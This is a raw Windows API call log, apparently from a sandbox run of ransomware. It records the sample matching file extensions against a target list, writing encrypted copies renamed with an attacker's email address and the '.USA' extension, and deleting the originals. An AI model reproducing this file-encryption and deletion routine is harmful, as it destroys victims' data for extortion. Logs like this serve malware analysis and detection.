lstrlenW (lpString=".docx") returned 5 [0041.812] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0041.812] lstrlenW (lpString=".pdf") returned 4 [0041.813] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.813] lstrlenW (lpString=".xls") returned 4 [0041.813] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.813] lstrlenW (lpString=".xlsx") returned 5 [0041.813] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0041.813] lstrlenW (lpString=".ppt") returned 4 [0041.813] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.813] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML") returned 102 [0041.813] lstrlenW (lpString=".zip") returned 4 [0041.813] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.813] lstrlenW (lpString=".rar") returned 4 [0041.813] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.813] lstrlenW (lpString=".bz2") returned 4 [0041.813] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.813] lstrlenW (lpString=".7z") returned 3 [0041.813] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.813] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML") returned 102 [0041.813] lstrlenW (lpString=".dbf") returned 4 [0041.813] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.813] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML") returned 102 [0041.813] lstrlenW (lpString=".1cd") returned 4 [0041.813] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.813] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML") returned 102 [0041.813] lstrlenW (lpString=".jpg") returned 4 [0041.813] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.813] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML") returned 102 [0041.813] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML") returned 102 [0041.813] lstrlenW (lpString=".doc") returned 4 [0041.813] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.813] lstrlenW (lpString=".docx") returned 5 [0041.813] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0041.813] lstrlenW (lpString=".pdf") returned 4 [0041.813] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.814] lstrlenW (lpString=".xls") returned 4 [0041.814] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.814] lstrlenW (lpString=".xlsx") returned 5 [0041.814] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0041.814] lstrlenW (lpString=".ppt") returned 4 [0041.814] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.814] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML") returned 102 [0041.814] lstrlenW (lpString=".zip") returned 4 [0041.814] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.814] lstrlenW (lpString=".rar") returned 4 [0041.814] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.814] lstrlenW (lpString=".bz2") returned 4 [0041.814] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.814] lstrlenW (lpString=".7z") returned 3 [0041.814] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.814] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML") returned 102 [0041.814] lstrlenW (lpString=".dbf") returned 4 [0041.814] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.814] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML") returned 102 [0041.814] lstrlenW (lpString=".1cd") returned 4 [0041.814] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.814] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML") returned 102 [0041.814] lstrlenW (lpString=".jpg") returned 4 [0041.814] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.814] lstrcmpiW (lpString1=".TXT", lpString2=".USA") returned -1 [0041.814] lstrlenW (lpString="METCONV.TXT") returned 11 [0041.814] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\metconv.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0041.815] GetFileSizeEx (in: hFile=0x1b8, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=1183416) returned 1 [0041.815] CloseHandle (hObject=0x1b8) returned 1 [0041.815] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\metconv.txt")) returned 0x20 [0041.815] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\metconv.txt.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0041.815] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\metconv.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0041.815] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0041.816] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0041.816] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\metconv.txt.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0041.816] GetLastError () returned 0x0 [0041.816] ReadFile (in: hFile=0x1b8, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0xffff0, lpOverlapped=0x0) returned 1 [0041.839] WriteFile (in: hFile=0x160, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xffff0, lpOverlapped=0x0) returned 1 [0042.023] ReadFile (in: hFile=0x1b8, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x20ec8, lpOverlapped=0x0) returned 1 [0042.171] WriteFile (in: hFile=0x160, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0x20ed0, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0x20ed0, lpOverlapped=0x0) returned 1 [0042.176] ReadFile (in: hFile=0x1b8, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0042.176] WriteFile (in: hFile=0x160, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xea, lpOverlapped=0x0) returned 1 [0042.176] SetEndOfFile (hFile=0x160) returned 1 [0042.176] CloseHandle (hObject=0x160) returned 1 [0042.189] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0042.189] SetEndOfFile (hFile=0x1b8) returned 1 [0042.190] CloseHandle (hObject=0x1b8) returned 1 [0042.190] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0042.191] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\metconv.txt")) returned 1 [0042.191] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT") returned 68 [0042.191] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT") returned 68 [0042.191] lstrlenW (lpString=".doc") returned 4 [0042.191] lstrcmpiW (lpString1=".doc", lpString2=".TXT") returned -1 [0042.191] lstrlenW (lpString=".docx") returned 5 [0042.191] lstrcmpiW (lpString1=".docx", lpString2="V.TXT") returned -1 [0042.191] lstrlenW (lpString=".pdf") returned 4 [0042.191] lstrcmpiW (lpString1=".pdf", lpString2=".TXT") returned -1 [0042.191] lstrlenW (lpString=".xls") returned 4 [0042.191] lstrcmpiW (lpString1=".xls", lpString2=".TXT") returned 1 [0042.191] lstrlenW (lpString=".xlsx") returned 5 [0042.191] lstrcmpiW (lpString1=".xlsx", lpString2="V.TXT") returned -1 [0042.191] lstrlenW (lpString=".ppt") returned 4 [0042.191] lstrcmpiW (lpString1=".ppt", lpString2=".TXT") returned -1 [0042.191] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT") returned 68 [0042.191] lstrlenW (lpString=".zip") returned 4 [0042.191] lstrcmpiW (lpString1=".zip", lpString2=".TXT") returned 1 [0042.191] lstrlenW (lpString=".rar") returned 4 [0042.191] lstrcmpiW (lpString1=".rar", lpString2=".TXT") returned -1 [0042.191] lstrlenW (lpString=".bz2") returned 4 [0042.191] lstrcmpiW (lpString1=".bz2", lpString2=".TXT") returned -1 [0042.191] lstrlenW (lpString=".7z") returned 3 [0042.192] lstrcmpiW (lpString1=".7z", lpString2="TXT") returned -1 [0042.192] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT") returned 68 [0042.192] lstrlenW (lpString=".dbf") returned 4 [0042.192] lstrcmpiW (lpString1=".dbf", lpString2=".TXT") returned -1 [0042.192] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT") returned 68 [0042.192] lstrlenW (lpString=".1cd") returned 4 [0042.192] lstrcmpiW (lpString1=".1cd", lpString2=".TXT") returned -1 [0042.192] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT") returned 68 [0042.192] lstrlenW (lpString=".jpg") returned 4 [0042.192] lstrcmpiW (lpString1=".jpg", lpString2=".TXT") returned -1 [0042.192] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT") returned 68 [0042.192] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT") returned 68 [0042.192] lstrlenW (lpString=".doc") returned 4 [0042.192] lstrcmpiW (lpString1=".doc", lpString2=".TXT") returned -1 [0042.192] lstrlenW (lpString=".docx") returned 5 [0042.192] lstrcmpiW (lpString1=".docx", lpString2="V.TXT") returned -1 [0042.192] lstrlenW (lpString=".pdf") returned 4 [0042.192] lstrcmpiW (lpString1=".pdf", lpString2=".TXT") returned -1 [0042.192] lstrlenW (lpString=".xls") returned 4 [0042.192] lstrcmpiW (lpString1=".xls", lpString2=".TXT") returned 1 [0042.192] lstrlenW (lpString=".xlsx") returned 5 [0042.192] lstrcmpiW (lpString1=".xlsx", lpString2="V.TXT") returned -1 [0042.192] lstrlenW (lpString=".ppt") returned 4 [0042.192] lstrcmpiW (lpString1=".ppt", lpString2=".TXT") returned -1 [0042.192] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT") returned 68 [0042.192] lstrlenW (lpString=".zip") returned 4 [0042.192] lstrcmpiW (lpString1=".zip", lpString2=".TXT") returned 1 [0042.192] lstrlenW (lpString=".rar") returned 4 [0042.192] lstrcmpiW (lpString1=".rar", lpString2=".TXT") returned -1 [0042.192] lstrlenW (lpString=".bz2") returned 4 [0042.192] lstrcmpiW (lpString1=".bz2", lpString2=".TXT") returned -1 [0042.192] lstrlenW (lpString=".7z") returned 3 [0042.192] lstrcmpiW (lpString1=".7z", lpString2="TXT") returned -1 [0042.192] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT") returned 68 [0042.193] lstrlenW (lpString=".dbf") returned 4 [0042.193] lstrcmpiW (lpString1=".dbf", lpString2=".TXT") returned -1 [0042.193] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT") returned 68 [0042.193] lstrlenW (lpString=".1cd") returned 4 [0042.193] lstrcmpiW (lpString1=".1cd", lpString2=".TXT") returned -1 [0042.193] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT") returned 68 [0042.193] lstrlenW (lpString=".jpg") returned 4 [0042.193] lstrcmpiW (lpString1=".jpg", lpString2=".TXT") returned -1 [0042.193] lstrcmpiW (lpString1=".gif", lpString2=".USA") returned -1 [0042.193] lstrlenW (lpString="Cave_Drawings.gif") returned 17 [0042.193] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\cave_drawings.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0042.931] GetFileSizeEx (in: hFile=0x208, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=4587) returned 1 [0042.932] CloseHandle (hObject=0x208) returned 1 [0042.932] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\cave_drawings.gif")) returned 0x20 [0042.932] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\cave_drawings.gif.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0042.932] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\cave_drawings.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0042.932] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif") returned 75 [0042.932] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif") returned 75 [0042.932] lstrlenW (lpString=".doc") returned 4 [0042.932] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0042.932] lstrlenW (lpString=".docx") returned 5 [0042.932] lstrcmpiW (lpString1=".docx", lpString2="s.gif") returned -1 [0042.932] lstrlenW (lpString=".pdf") returned 4 [0042.932] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0042.932] lstrlenW (lpString=".xls") returned 4 [0042.932] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0042.932] lstrlenW (lpString=".xlsx") returned 5 [0042.932] lstrcmpiW (lpString1=".xlsx", lpString2="s.gif") returned -1 [0042.932] lstrlenW (lpString=".ppt") returned 4 [0042.932] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0042.932] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif") returned 75 [0042.932] lstrlenW (lpString=".zip") returned 4 [0042.932] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0042.933] lstrlenW (lpString=".rar") returned 4 [0042.933] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0042.933] lstrlenW (lpString=".bz2") returned 4 [0042.933] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0042.933] lstrlenW (lpString=".7z") returned 3 [0042.933] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0042.933] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif") returned 75 [0042.933] lstrlenW (lpString=".dbf") returned 4 [0042.933] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0042.933] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif") returned 75 [0042.933] lstrlenW (lpString=".1cd") returned 4 [0042.933] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0042.933] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif") returned 75 [0042.933] lstrlenW (lpString=".jpg") returned 4 [0042.933] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0042.933] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif") returned 75 [0042.933] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif") returned 75 [0042.933] lstrlenW (lpString=".doc") returned 4 [0042.933] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0042.933] lstrlenW (lpString=".docx") returned 5 [0042.933] lstrcmpiW (lpString1=".docx", lpString2="s.gif") returned -1 [0042.933] lstrlenW (lpString=".pdf") returned 4 [0042.933] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0042.933] lstrlenW (lpString=".xls") returned 4 [0042.933] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0042.933] lstrlenW (lpString=".xlsx") returned 5 [0042.933] lstrcmpiW (lpString1=".xlsx", lpString2="s.gif") returned -1 [0042.933] lstrlenW (lpString=".ppt") returned 4 [0042.933] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0042.933] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif") returned 75 [0042.933] lstrlenW (lpString=".zip") returned 4 [0042.933] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0042.933] lstrlenW (lpString=".rar") returned 4 [0042.933] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0042.934] lstrlenW (lpString=".bz2") returned 4 [0042.934] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0042.934] lstrlenW (lpString=".7z") returned 3 [0042.934] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0042.934] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif") returned 75 [0042.934] lstrlenW (lpString=".dbf") returned 4 [0042.934] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0042.934] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif") returned 75 [0042.934] lstrlenW (lpString=".1cd") returned 4 [0042.934] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0042.934] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif") returned 75 [0042.934] lstrlenW (lpString=".jpg") returned 4 [0042.934] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0042.934] lstrcmpiW (lpString1=".GIF", lpString2=".USA") returned -1 [0042.934] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0042.934] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0044.834] GetFileSizeEx (in: hFile=0x20c, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=2985) returned 1 [0044.834] CloseHandle (hObject=0x20c) returned 1 [0044.834] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\preview.gif")) returned 0x20 [0044.834] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0044.834] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0044.834] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0044.834] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0044.835] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0045.142] GetLastError () returned 0x0 [0045.142] ReadFile (in: hFile=0x20c, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0xba9, lpOverlapped=0x0) returned 1 [0045.239] WriteFile (in: hFile=0x1b8, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xbb0, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xbb0, lpOverlapped=0x0) returned 1 [0045.240] ReadFile (in: hFile=0x20c, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0045.240] WriteFile (in: hFile=0x1b8, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xea, lpOverlapped=0x0) returned 1 [0045.240] SetEndOfFile (hFile=0x1b8) returned 1 [0045.240] CloseHandle (hObject=0x1b8) returned 1 [0045.241] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0045.241] SetEndOfFile (hFile=0x20c) returned 1 [0045.241] CloseHandle (hObject=0x20c) returned 1 [0045.241] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0045.242] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\preview.gif")) returned 1 [0045.242] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF") returned 74 [0045.242] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF") returned 74 [0045.242] lstrlenW (lpString=".doc") returned 4 [0045.242] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0045.242] lstrlenW (lpString=".docx") returned 5 [0045.242] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0045.242] lstrlenW (lpString=".pdf") returned 4 [0045.242] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0045.242] lstrlenW (lpString=".xls") returned 4 [0045.242] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0045.242] lstrlenW (lpString=".xlsx") returned 5 [0045.242] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0045.242] lstrlenW (lpString=".ppt") returned 4 [0045.242] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0045.242] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF") returned 74 [0045.242] lstrlenW (lpString=".zip") returned 4 [0045.242] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0045.242] lstrlenW (lpString=".rar") returned 4 [0045.242] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0045.242] lstrlenW (lpString=".bz2") returned 4 [0045.242] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0045.242] lstrlenW (lpString=".7z") returned 3 [0045.242] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0045.242] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF") returned 74 [0045.243] lstrlenW (lpString=".dbf") returned 4 [0045.243] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0045.243] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF") returned 74 [0045.243] lstrlenW (lpString=".1cd") returned 4 [0045.243] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0045.243] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF") returned 74 [0045.243] lstrlenW (lpString=".jpg") returned 4 [0045.243] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0045.243] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF") returned 74 [0045.243] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF") returned 74 [0045.243] lstrlenW (lpString=".doc") returned 4 [0045.243] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0045.243] lstrlenW (lpString=".docx") returned 5 [0045.243] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0045.243] lstrlenW (lpString=".pdf") returned 4 [0045.243] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 